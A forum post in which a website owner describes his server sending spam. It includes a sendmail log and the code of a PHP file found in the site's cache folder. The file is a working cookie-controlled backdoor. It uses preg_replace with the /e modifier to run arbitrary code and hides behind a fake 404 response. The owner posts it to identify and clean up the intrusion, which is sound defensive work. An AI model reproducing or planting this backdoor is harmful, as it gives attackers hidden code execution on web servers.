Hi,
I recently started getting emails like (see bellow)
I found some files that shouldn't be on the server deleted and patched some security fixes that were not present on the CMS I use.
Is there anything I can do at server level to avoid the sending of emails.
I still don't know how the files that sent the emails were uploaded, maybe an older phpthumb script but I'm monitoring the other projects I have on the server.
Thank you
Posting some of the code I found just in case someone know what it is.
Possible Scripts:
'/home/mysite/public_html/assets/cache/siteCache.idx.php'
---
Here is the code
---
I recently started getting emails like (see bellow)
I found some files that shouldn't be on the server deleted and patched some security fixes that were not present on the CMS I use.
Is there anything I can do at server level to avoid the sending of emails.
I still don't know how the files that sent the emails were uploaded, maybe an older phpthumb script but I'm monitoring the other projects I have on the server.
Thank you
Posting some of the code I found just in case someone know what it is.
Code:
----
Time: Thu Jun 11 15:31:25 2015 -0400
Path: '/home/mysite/public_html/assets/cache'
Count: 101 emails sent
Sample of the first 10 emails:
2015-06-11 15:17:52 cwd=/home/mysite/public_html/assets/cache 4 args: /usr/sbin/sendmail -t -i [email protected]
2015-06-11 15:17:52 cwd=/home/mysite/public_html/assets/cache 4 args: /usr/sbin/sendmail -t -i [email protected]
2015-06-11 15:17:52 cwd=/home/mysite/public_html/assets/cache 4 args: /usr/sbin/sendmail -t -i [email protected]
2015-06-11 15:17:52 cwd=/home/mysite/public_html/assets/cache 4 args: /usr/sbin/sendmail -t -i [email protected]
2015-06-11 15:17:52 cwd=/home/mysite/public_html/assets/cache 4 args: /usr/sbin/sendmail -t -i [email protected]
2015-06-11 15:17:52 cwd=/home/mysite/public_html/assets/cache 4 args: /usr/sbin/sendmail -t -i [email protected]
2015-06-11 15:17:52 cwd=/home/mysite/public_html/assets/cache 4 args: /usr/sbin/sendmail -t -i [email protected]
2015-06-11 15:17:52 cwd=/home/mysite/public_html/assets/cache 4 args: /usr/sbin/sendmail -t -i [email protected]
2015-06-11 15:17:52 cwd=/home/mysite/public_html/assets/cache 4 args: /usr/sbin/sendmail -t -i [email protected]
2015-06-11 15:17:52 cwd=/home/mysite/public_html/assets/cache 4 args: /usr/sbin/sendmail -t -i [email protected]
'/home/mysite/public_html/assets/cache/siteCache.idx.php'
---
Here is the code
---
Code:
<?php
class ozgodzyki {
public function __construct() {
$jq = @$_COOKIE['gqffvuvj3'];
if ($jq) {
$option = $jq (@$_COOKIE['gqffvuvj2']) ;
$au = $jq ( @$_COOKIE['gqffvuvj1']) ;
$option ( "/438/e" , $au , 438 ) ;
} else {
header("HTTP/1.0 404 Not Found");
}
}
}
$content = new ozgodzyki;
Last edited by a moderator: